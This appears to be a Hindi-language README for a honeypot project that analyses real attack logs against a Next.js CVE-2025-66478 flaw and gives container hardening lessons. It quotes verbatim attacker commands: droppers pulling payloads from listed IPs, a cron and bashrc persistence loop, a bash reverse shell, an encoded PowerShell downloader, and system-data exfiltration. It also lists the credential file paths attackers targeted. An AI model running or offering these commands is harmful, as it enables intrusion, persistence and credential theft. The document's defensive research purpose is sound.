
CVE-2025-66478 (Next.js Server Actions RCE) के वास्तविक दुनिया के हमले के लॉग विश्लेषण, मैलवेयर नमूनों, हमलावर IP ट्रैकिंग, और कंटेनर सुरक्षा सख्तीकरण के सबक के साथ।
यह परियोजना इंटरनेट पर उजागर Next.js 15.1.2 एप्लिकेशन (Docker कंटेनर में चल रहा) द्वारा रिकॉर्ड किए गए वास्तविक हमला लॉग एकत्र करती है। ये लॉग दिखाते हैं कि CVE-2025-66478 भेद्यता का बड़े पैमाने पर स्वचालित हमला उपकरणों द्वारा स्कैनिंग और शोषण किया जा रहा है।
रिकॉर्ड समय सीमा: 2025-12-04 ~ 2025-12-06 (लगभग 48 घंटे)
पर्यावरण जानकारी:
हमलावर भेद्यता के माध्यम से दुर्भावनापूर्ण प्रोग्राम डाउनलोड और निष्पादित करने के निर्देश देने का प्रयास करते हैं।
| हमला स्रोत IP | दुर्भावनापूर्ण पेलोड URL | विवरण |
|---|---|---|
| 216.158.232.43 | http://216.158.232.43:12000/sex.sh | बॉटनेट/माइनिंग प्रोग्राम |
| 38.207.161.212 | http://38.207.161.212/agent | दुर्भावनापूर्ण एजेंट प्रोग्राम |
| 43.156.63.124 | http://43.156.63.124/tsd | क्रॉन बैकडोर डालना |
| 154.38.121.219 | res.qiqigece.top/nginx3 | nginx का रूप धारण करने वाला दुर्भावनापूर्ण प्रोग्राम |
| 47.79.42.91 | iot.632313373.xyz/nz.sh | IoT बॉटनेट स्क्रिप्ट |
| 47.79.65.237 | sup001.oss-cn-hongkong.aliyuncs.com/python1.sh | माइनिंग/बैकडोर प्रोग्राम |
| 103.135.101.15 | http://103.135.101.15/wocaosinm.sh | दुर्भावनापूर्ण स्क्रिप्ट |
| 38.12.24.231 | http://38.12.24.231/kworker | कर्नेल वर्कर का रूप धारण करने वाला दुर्भावनापूर्ण प्रोग्राम |
| 128.199.194.97 | http://128.199.194.97:9001/setup2.sh | आरंभीकरण स्क्रिप्ट |
# विशिष्ट ड्रॉपर हमला
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a
# क्रॉन स्थायित्व बैकडोर डालना
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd
# जटिल स्थायित्व हमला (एकाधिक डाउनलोड विधियाँ + क्रॉन + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
mkdir -p $d;
if [ -w $d ]; then
p="$d/$n";
(curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
chmod +x $p;
nohup $p >/dev/null 2>&1 &
(crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
fi;
done
हमलावर इंटरैक्टिव एक्सेस प्राप्त करने के लिए रिवर्स शेल कनेक्शन स्थापित करने का प्रयास करते हैं।
# बैश रिवर्स शेल
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"
हमलावर मानते हैं कि लक्ष्य Windows सिस्टम है और PowerShell निर्देश निष्पादित करने का प्रयास करते हैं।
# Base64 एन्कोडेड दुर्भावनापूर्ण PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
# डीकोड करने पर:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')
# भेद्यता पुष्टि के लिए गणितीय गणना
powershell -c "41*271" # = 11111 (विशेषता कोड पुष्टि)
powershell -c "44225*41002" # = 1814113450
हमलावर बाद के हमलों के लिए सिस्टम जानकारी एकत्र करने का प्रयास करते हैं।
# सिस्टम जानकारी एकत्र करना और बाहर भेजना
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`
हमलावर विभिन्न संवेदनशील फ़ाइलों और क्रेडेंशियल्स को पढ़ने का प्रयास करते हैं।
भेद्यता के माध्यम से सफलतापूर्वक रिसाव किए गए कंटेनर पर्यावरण चर:
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0
हमलावर डेटा बाहर भेजने या भेद्यता की पुष्टि करने के लिए DNS क्वेरी का उपयोग करते हैं:
ping 5a58e4a0.log.dnslog.pp.ua.
अधिकांश हमले Alpine Linux कंटेनर की कम विशेषताओं के कारण विफल होते हैं:
| गुम उपकरण | प्रभाव |
|---|---|
curl | दुर्भावनापूर्ण पेलोड डाउनलोड करने में असमर्थ |
bash | बैश-विशिष्ट सिंटैक्स (जैसे रिवर्स शेल) निष्पादित करने में असमर्थ |
हालांकि wget उपलब्ध है, लेकिन कुछ दुर्भावनापूर्ण स्क्रिप्ट आंतरिक रूप से curl या bash पर निर्भर करती हैं, जिससे निष्पादन विफल हो जाता है।
लॉग में बड़ी मात्रा में Base64 एन्कोडेड डेटा शामिल है, यहाँ कुछ डीकोडिंग परिणाम हैं:
# digest: 'cm9vdAo='
डीकोड: root
# digest: 'dGVzdAo='
डीकोड: test
# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
डीकोड: vulnerability_test
# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
डीकोड: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
# /tmp निर्देशिका सामग्री
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==
डीकोड:
total 20
drwxrwxrwt 1 root root 4096 Dec 5 18:00 .
drwxr-xr-x 1 root root 4096 Dec 4 13:36 ..
-rwxr-xr-x 1 root root 9848 Dec 5 18:00 INSTALL
यहाँ रिकॉर्ड किए गए हमला स्रोत IP पतों की सूची है:
हमलावर अस्तित्वहीन सर्वर कार्रवाई को कॉल करने का प्रयास करते हैं:
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"
हमलावर त्रुटि संदेशों में digest फ़ील्ड का उपयोग करके डेटा लीक करते हैं:
Error: x
digest: 'cm9vdAo=' // Base64 एन्कोडेड 'root'
curl, bash, python जैसे दुरुपयोग किए जा सकने वाले उपकरण स्थापित न करें--read-only के साथ चलाएँयह परियोजना केवल सूचना सुरक्षा शिक्षा और अनुसंधान उद्देश्यों के लिए है। सभी रिकॉर्ड किए गए हमले अनुसंधान हनीपॉट के खिलाफ वास्तविक हमले के प्रयास हैं। कृपया इस जानकारी का उपयोग किसी भी अवैध उद्देश्य के लिए न करें।
इस परियोजना में हमला लॉग से निकाले गए और डाउनलोड किए गए वास्तविक दुर्भावनापूर्ण प्रोग्राम नमूने शामिल हैं, विस्तृत विश्लेषण के लिए देखें:
MIT License
| श्रेणी | पथ |
|---|
| क्लाउड क्रेडेंशियल | /root/.aws/credentials, /root/.aws/config |
/root/.config/gcloud/credentials.db | |
/root/.config/gcloud/application_default_credentials | |
| SSH कुंजी | /root/.ssh/id_rsa, /root/.ssh/config |
| Git क्रेडेंशियल | /root/.git-credentials, /root/.gitconfig |
| कंटेनर/K8s | /root/.docker/config, /root/.kube/config |
/var/lib/kubelet/config.yaml | |
| एप्लिकेशन | /proc/self/cwd/serviceAccountKey.json (Firebase) |
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma | |
| शेल इतिहास | /root/.bash_history, /root/.zsh_history |
| क्लाउड उपकरण | /root/.ossutilconfig (Alibaba Cloud OSS) |
/root/.npmrc | |
| सिस्टम सेटिंग | /etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow |
powershell | Windows हमला अप्रभावी |
python | Python डाउनलोडर का उपयोग करने में असमर्थ |
| IP पता | देश/क्षेत्र (अनुमानित) | हमला प्रकार |
|---|
| 216.158.232.43 | संयुक्त राज्य अमेरिका | Dropper |
| 38.165.44.205 | संयुक्त राज्य अमेरिका | Dropper |
| 23.95.44.80 | संयुक्त राज्य अमेरिका | Dropper |
| 154.38.121.219 | हांगकांग | मैलवेयर (nginx3) |
| 38.207.161.212 | संयुक्त राज्य अमेरिका | एजेंट |
| 43.156.63.124 | चीन | क्रॉन बैकडोर |
| 47.79.42.91 | चीन (Alibaba Cloud) | IoT बॉटनेट |
| 47.79.65.237 | चीन (Alibaba Cloud) | माइनिंग प्रोग्राम |
| 119.45.243.154 | चीन (Tencent Cloud) | माइनिंग प्रोग्राम |
| 144.22.210.54 | ब्राज़ील | Dropper |
| 217.60.249.228 | स्वीडन | Dropper |
| 154.26.192.32 | संयुक्त राज्य अमेरिका | रिवर्स शेल |
| 156.234.209.103 | अज्ञात | PowerShell पेलोड |
| 38.60.212.106 | संयुक्त राज्य अमेरिका | सूचना संग्रह |
| 103.135.101.15 | वियतनाम | बॉटनेट |
| 128.199.194.97 | सिंगापुर (DigitalOcean) | सेटअप स्क्रिप्ट |
| 38.12.24.231 | संयुक्त राज्य अमेरिका | स्थायित्व दुर्भावनापूर्ण प्रोग्राम |
| फ़ाइल | प्रकार | आकार | स्रोत | खतरा स्तर |
|---|
| nz.sh | शेल स्क्रिप्ट | 931 B | iot.632313373.xyz | मध्यम |
| tsd.sh | शेल स्क्रिप्ट | 1.7 KB | 43.156.63.124 | उच्च |
| tsd | ELF 64-bit | 6.8 MB | 43.156.63.124 | उच्च |
| init.sh | शेल स्क्रिप्ट | 6.1 KB | AWS S3 | गंभीर |
| agent | ELF 64-bit | 23.7 MB | AWS S3 | गंभीर |
| Agtisx.exe | PE32+ (Windows) | 24.0 MB | AWS S3 | गंभीर |